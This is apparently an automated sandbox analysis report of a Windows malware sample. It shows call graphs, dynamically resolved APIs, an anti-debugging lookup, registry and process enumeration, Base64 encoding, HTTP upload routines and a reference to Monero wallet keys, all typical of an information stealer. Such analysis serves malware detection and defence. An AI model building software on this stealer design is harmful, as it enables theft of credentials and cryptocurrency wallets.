GetProcessHeap RtlAllocateHeap wsprintfA 15741->15742 15744 55a740 lstrcpy 15742->15744 15745 55230b 15744->15745 15745->15171 15747 55a740 lstrcpy 15746->15747 15748 558229 15747->15748 15749 558263 15748->15749 15750 55a9b0 lstrcpy lstrlen lstrcpy lstrcat 15748->15750 15753 55a8a0 lstrcpy 15748->15753 15751 55a7a0 lstrcpy 15749->15751 15750->15748 15752 5582dc 15751->15752 15752->15188 15753->15748 15755 55a740 lstrcpy 15754->15755 15756 55835c RegOpenKeyExA 15755->15756 15757 5583d0 15756->15757 15758 5583ae 15756->15758 15760 558613 RegCloseKey 15757->15760 15761 5583f8 RegEnumKeyExA 15757->15761 15759 55a7a0 lstrcpy 15758->15759 15770 5583bd 15759->15770 15764 55a7a0 lstrcpy 15760->15764 15762 55843f wsprintfA RegOpenKeyExA 15761->15762 15763 55860e 15761->15763 15765 558485 RegCloseKey RegCloseKey 15762->15765 15766 5584c1 RegQueryValueExA 15762->15766 15763->15760 15764->15770 15767 55a7a0 lstrcpy 15765->15767 15768 558601 RegCloseKey 15766->15768 15769 5584fa lstrlen 15766->15769 15767->15770 15768->15763 15769->15768 15771 558510 15769->15771 15770->15214 15772 55a9b0 4 API calls 15771->15772 15773 558527 15772->15773 15774 55a8a0 lstrcpy 15773->15774 15775 558533 15774->15775 15776 55a9b0 4 API calls 15775->15776 15777 558557 15776->15777 15778 55a8a0 lstrcpy 15777->15778 15779 558563 15778->15779 15780 55856e RegQueryValueExA 15779->15780 15780->15768 15781 5585a3 15780->15781 15782 55a9b0 4 API calls 15781->15782 15783 5585ba 15782->15783 15784 55a8a0 lstrcpy 15783->15784 15785 5585c6 15784->15785 15786 55a9b0 4 API calls 15785->15786 15787 5585ea 15786->15787 15788 55a8a0 lstrcpy 15787->15788 15789 5585f6 15788->15789 15789->15768 15791 55a740 lstrcpy 15790->15791 15792 5586bc CreateToolhelp32Snapshot Process32First 15791->15792 15793 55875d CloseHandle 15792->15793 15794 5586e8 Process32Next 15792->15794 15795 55a7a0 lstrcpy 15793->15795 15794->15793 15796 5586fd 15794->15796 15797 558776 15795->15797 15796->15794 15798 55a9b0 lstrcpy lstrlen lstrcpy lstrcat 15796->15798 15799 55a8a0 lstrcpy 15796->15799 15797->15246 15798->15796 15799->15796 15801 55a7a0 lstrcpy 15800->15801 15802 5551b5 15801->15802 15803 541590 lstrcpy 15802->15803 15804 5551c6 15803->15804 15819 545100 15804->15819 15806 5551cf 15806->15258 15810 557720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15807->15810 15809 5576b9 15809->15682 15809->15683 15811 557765 RegQueryValueExA 15810->15811 15812 557780 RegCloseKey 15810->15812 15811->15812 15813 557793 15812->15813 15813->15809 15814->15694 15816 558a0c 15815->15816 15817 5589f9 GetProcessHeap HeapFree 15815->15817 15816->15732 15817->15816 15818->15732 15820 55a7a0 lstrcpy 15819->15820 15821 545119 15820->15821 15822 5447b0 2 API calls 15821->15822 15823 545125 15822->15823 15979 558ea0 15823->15979 15825 545184 15826 545192 lstrlen 15825->15826 15827 5451a5 15826->15827 15828 558ea0 4 API calls 15827->15828 15829 5451b6 15828->15829 15830 55a740 lstrcpy 15829->15830 15831 5451c9 15830->15831 15832 55a740 lstrcpy 15831->15832 15833 5451d6 15832->15833 15834 55a740 lstrcpy 15833->15834 15835 5451e3 15834->15835 15836 55a740 lstrcpy 15835->15836 15837 5451f0 15836->15837 15838 55a740 lstrcpy 15837->15838 15839 5451fd InternetOpenA StrCmpCA 15838->15839 15840 54522f 15839->15840 15841 5458c4 InternetCloseHandle 15840->15841 15842 558b60 3 API calls 15840->15842 15848 5458d9 ctype 15841->15848 15843 54524e 15842->15843 15844 55a920 3 API calls 15843->15844 15845 545261 15844->15845 15846 55a8a0 lstrcpy 15845->15846 15847 54526a 15846->15847 15849 55a9b0 4 API calls 15847->15849 15852 55a7a0 lstrcpy 15848->15852 15850 5452ab 15849->15850 15851 55a920 3 API calls 15850->15851 15853 5452b2 15851->15853 15860 545913 15852->15860 15854 55a9b0 4 API calls 15853->15854 15855 5452b9 15854->15855 15856 55a8a0 lstrcpy 15855->15856 15857 5452c2 15856->15857 15858 55a9b0 4 API calls 15857->15858 15859 545303 15858->15859 15861 55a920 3 API calls 15859->15861 15860->15806 15862 54530a 15861->15862 15863 55a8a0 lstrcpy 15862->15863 15864 545313 15863->15864 15865 545329 InternetConnectA 15864->15865 15865->15841 15866 545359 HttpOpenRequestA 15865->15866 15868 5458b7 InternetCloseHandle 15866->15868 15869 5453b7 15866->15869 15868->15841 15870 55a9b0 4 API calls 15869->15870 15871 5453cb 15870->15871 15872 55a8a0 lstrcpy 15871->15872 15873 5453d4 15872->15873 15874 55a920 3 API calls 15873->15874 15875 5453f2 15874->15875 15876 55a8a0 lstrcpy 15875->15876 15877 5453fb 15876->15877 15878 55a9b0 4 API calls 15877->15878 15879 54541a 15878->15879 15880 55a8a0 lstrcpy 15879->15880 15881 545423 15880->15881 15882 55a9b0 4 API calls 15881->15882 15883 545444 15882->15883 15884 55a8a0 lstrcpy 15883->15884 15885 54544d 15884->15885 15886 55a9b0 4 API calls 15885->15886 15887 54546e 15886->15887 15888 55a8a0 lstrcpy 15887->15888 15889 545477 15888->15889 15980 558ead CryptBinaryToStringA 15979->15980 15981 558ea9 15979->15981 15980->15981 15982 558ece GetProcessHeap RtlAllocateHeap 15980->15982 15981->15825 15982->15981 15983 558ef4 ctype 15982->15983 15984 558f05 CryptBinaryToStringA 15983->15984 15984->15981 15988->15261 16231 549880 15989->16231 15991 5498e1 15991->15268 15993 55a740 lstrcpy 15992->15993 15994 54fb16 15993->15994 16166 55a740 lstrcpy 16165->16166 16167 550266 16166->16167 16168 558de0 2 API calls 16167->16168 16169 55027b 16168->16169 16170 55a920 3 API calls 16169->16170 16171 55028b 16170->16171 16172 55a8a0 lstrcpy 16171->16172 16173 550294 16172->16173 16174 55a9b0 4 API calls 16173->16174 16175 5502b8 16174->16175 16232 54988e 16231->16232 16235 546fb0 16232->16235 16234 5498ad ctype 16234->15991 16238 546d40 16235->16238 16239 546d63 16238->16239 16251 546d59 16238->16251 16239->16251 16252 546660 16239->16252 16241 546dbe 16241->16251 16258 5469b0 16241->16258 16243 546e2a 16244 546ee6 VirtualFree 16243->16244 16246 546ef7 16243->16246 16243->16251 16244->16246 16245 546f41 16249 5589f0 2 API calls 16245->16249 16245->16251 16246->16245 16247 546f26 FreeLibrary 16246->16247 16248 546f38 16246->16248 16247->16246 16250 5589f0 2 API calls 16248->16250 16249->16251 16250->16245 16251->16234 16257 54668f VirtualAlloc 16252->16257 16254 546730 16255 546743 VirtualAlloc 16254->16255 16256 54673c 16254->16256 16255->16256 16256->16241 16257->16254 16257->16256 16259 5469c9 16258->16259 16263 5469d5 16258->16263 16260 546a09 LoadLibraryA 16259->16260 16259->16263 16261 546a32 16260->16261 16260->16263 16265 546ae0 16261->16265 16268 558a10 GetProcessHeap RtlAllocateHeap 16261->16268 16263->16243 16264 546ba8 GetProcAddress 16264->16263 16264->16265 16265->16263 16265->16264 16266 5589f0 2 API calls 16266->16265 16267 546a8b 16267->16263 16267->16266 16268->16267

                                Executed Functions

                                Function 00559860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 660 559860-559874 call 559750 663 559a93-559af2 LoadLibraryA * 5 660->663 664 55987a-559a8e call 559780 GetProcAddress * 21 660->664 666 559af4-559b08 GetProcAddress 663->666 667 559b0d-559b14 663->667 664->663 666->667 669 559b46-559b4d 667->669 670 559b16-559b41 GetProcAddress * 2 667->670 671 559b4f-559b63 GetProcAddress 669->671 672 559b68-559b6f 669->672 670->669 671->672 673 559b71-559b84 GetProcAddress 672->673 674 559b89-559b90 672->674 673->674 675 559bc1-559bc2 674->675 676 559b92-559bbc GetProcAddress * 2 674->676 676->675
                                APIs
                                • GetProcAddress.KERNEL32(74DD0000,01073230), ref: 005598A1
                                • GetProcAddress.KERNEL32(74DD0000,010733B0), ref: 005598BA
                                • GetProcAddress.KERNEL32(74DD0000,01073308), ref: 005598D2
                                • GetProcAddress.KERNEL32(74DD0000,010732A8), ref: 005598EA
                                • GetProcAddress.KERNEL32(74DD0000,010731B8), ref: 00559903
                                • GetProcAddress.KERNEL32(74DD0000,01079F48), ref: 0055991B
                                • GetProcAddress.KERNEL32(74DD0000,01065850), ref: 00559933
                                • GetProcAddress.KERNEL32(74DD0000,01065970), ref: 0055994C
                                • GetProcAddress.KERNEL32(74DD0000,01073320), ref: 00559964
                                • GetProcAddress.KERNEL32(74DD0000,01073248), ref: 0055997C
                                • GetProcAddress.KERNEL32(74DD0000,01073338), ref: 00559995
                                • GetProcAddress.KERNEL32(74DD0000,01073158), ref: 005599AD
                                • GetProcAddress.KERNEL32(74DD0000,01065930), ref: 005599C5
                                • GetProcAddress.KERNEL32(74DD0000,010731A0), ref: 005599DE
                                • GetProcAddress.KERNEL32(74DD0000,010733C8), ref: 005599F6
                                • GetProcAddress.KERNEL32(74DD0000,01065870), ref: 00559A0E
                                • GetProcAddress.KERNEL32(74DD0000,01073260), ref: 00559A27
                                • GetProcAddress.KERNEL32(74DD0000,01073278), ref: 00559A3F
                                • GetProcAddress.KERNEL32(74DD0000,010659D0), ref: 00559A57
                                • GetProcAddress.KERNEL32(74DD0000,01073410), ref: 00559A70
                                • GetProcAddress.KERNEL32(74DD0000,010658F0), ref: 00559A88
                                • LoadLibraryA.KERNEL32(01073470,?,00556A00), ref: 00559A9A
                                • LoadLibraryA.KERNEL32(010734E8,?,00556A00), ref: 00559AAB
                                • LoadLibraryA.KERNEL32(01073488,?,00556A00), ref: 00559ABD
                                • LoadLibraryA.KERNEL32(010734A0,?,00556A00), ref: 00559ACF
                                • LoadLibraryA.KERNEL32(01073500,?,00556A00), ref: 00559AE0
                                • GetProcAddress.KERNEL32(75A70000,010734D0), ref: 00559B02
                                • GetProcAddress.KERNEL32(75290000,01073518), ref: 00559B23
                                • GetProcAddress.KERNEL32(75290000,01073458), ref: 00559B3B
                                • GetProcAddress.KERNEL32(75BD0000,010734B8), ref: 00559B5D
                                • GetProcAddress.KERNEL32(75450000,01065790), ref: 00559B7E
                                • GetProcAddress.KERNEL32(76E90000,01079EE8), ref: 00559B9F
                                • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00559BB6
                                Strings
                                • NtQueryInformationProcess, xrefs: 00559BAA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: NtQueryInformationProcess
                                • API String ID: 2238633743-2781105232
                                • Opcode ID: 8b462cd36f24df4b4ca510cad381d89232596f30f984a8449c6760beb18a746a
                                • Instruction ID: 20cf7de71441e090b42239d53a9037580b2980235055d27f3fc788ab4f19a7f6
                                • Opcode Fuzzy Hash: 8b462cd36f24df4b4ca510cad381d89232596f30f984a8449c6760beb18a746a
                                • Instruction Fuzzy Hash: CAA16BB5580240BFF345EFA8ED889563BF9F79C701734C51BA605C3224D63DA852EB2A
                                Function 005445C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 764 5445c0-544695 RtlAllocateHeap 781 5446a0-5446a6 764->781 782 5446ac-54474a 781->782 783 54474f-5447a9 VirtualProtect 781->783 782->781
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000), ref: 0054460F
                                • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0054479C
                                Strings
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0054477B
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00544622
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005445F3
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005446B7
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0054462D
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005446C2
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005446CD
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0054466D
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00544683
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00544713
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0054474F
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00544734
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005446AC
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00544770
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005445D2
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00544729
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0054475A
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0054473F
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00544657
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00544643
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00544662
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005445E8
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00544638
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005446D8
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005445DD
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00544617
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0054471E
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00544765
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00544678
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005445C7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeapProtectVirtual
                                • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                • API String ID: 1542196881-2218711628
                                • Opcode ID: 49bf594f273e335ed8b4a66599a256264e41b0a5c0b80f252b5c24db131ef5cd
                                • Instruction ID: b4e2900d39c80168f56040004a75208c7b498c8359da5846ea3c1461cf96589b
                                • Opcode Fuzzy Hash: 49bf594f273e335ed8b4a66599a256264e41b0a5c0b80f252b5c24db131ef5cd
                                • Instruction Fuzzy Hash: B141F5A1FC261C6AE634BBA4A86DFDE7A767FD2704F509240AC4053680DEB065234F1A
                                Function 00544880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 801 544880-544942 call 55a7a0 call 5447b0 call 55a740 * 5 InternetOpenA StrCmpCA 816 544944 801->816 817 54494b-54494f 801->817 816->817 818 544955-544acd call 558b60 call 55a920 call 55a8a0 call 55a800 * 2 call 55a9b0 call 55a8a0 call 55a800 call 55a9b0 call 55a8a0 call 55a800 call 55a920 call 55a8a0 call 55a800 call 55a9b0 call 55a8a0 call 55a800 call 55a9b0 call 55a8a0 call 55a800 call 55a9b0 call 55a920 call 55a8a0 call 55a800 * 2 InternetConnectA 817->818 819 544ecb-544ef3 InternetCloseHandle call 55aad0 call 549ac0 817->819 818->819 905 544ad3-544ad7 818->905 829 544ef5-544f2d call 55a820 call 55a9b0 call 55a8a0 call 55a800 819->829 830 544f32-544fa2 call 558990 * 2 call 55a7a0 call 55a800 * 8 819->830 829->830 906 544ae5 905->906 907 544ad9-544ae3 905->907 908 544aef-544b22 HttpOpenRequestA 906->908 907->908 909 544ebe-544ec5 InternetCloseHandle 908->909 910 544b28-544e28 call 55a9b0 call 55a8a0 call 55a800 call 55a920 call 55a8a0 call 55a800 call 55a9b0 call 55a8a0 call 55a800 call 55a9b0 call 55a8a0 call 55a800 call 55a9b0 call 55a8a0 call 55a800 call 55a9b0 call 55a8a0 call 55a800 call 55a920 call 55a8a0 call 55a800 call 55a9b0 call 55a8a0 call 55a800 call 55a9b0 call 55a8a0 call 55a800 call 55a920 call 55a8a0 call 55a800 call 55a9b0 call 55a8a0 call 55a800 call 55a9b0 call 55a8a0 call 55a800 call 55a9b0 call 55a8a0 call 55a800 call 55a9b0 call 55a8a0 call 55a800 call 55a920 call 55a8a0 call 55a800 call 55a740 call 55a920 * 2 call 55a8a0 call 55a800 * 2 call 55aad0 lstrlen call 55aad0 * 2 lstrlen call 55aad0 HttpSendRequestA 908->910 909->819 1021 544e32-544e5c InternetReadFile 910->1021 1022 544e67-544eb9 InternetCloseHandle call 55a800 1021->1022 1023 544e5e-544e65 1021->1023 1022->909 1023->1022 1024 544e69-544ea7 call 55a9b0 call 55a8a0 call 55a800 1023->1024 1024->1021
                                APIs
                                  • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                                  • Part of subcall function 005447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00544839
                                  • Part of subcall function 005447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00544849
                                  • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00544915
                                • StrCmpCA.SHLWAPI(?,0107F608), ref: 0054493A
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00544ABA
                                • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00560DDB,00000000,?,?,00000000,?,",00000000,?,0107F448), ref: 00544DE8
                                • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00544E04
                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00544E18
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00544E49
                                • InternetCloseHandle.WININET(00000000), ref: 00544EAD
                                • InternetCloseHandle.WININET(00000000), ref: 00544EC5
                                • HttpOpenRequestA.WININET(00000000,0107F498,?,0107EFB8,00000000,00000000,00400100,00000000), ref: 00544B15
                                  • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,0107A078,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                                  • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                                  • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                                  • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                                  • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                                  • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                                • InternetCloseHandle.WININET(00000000), ref: 00544ECF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
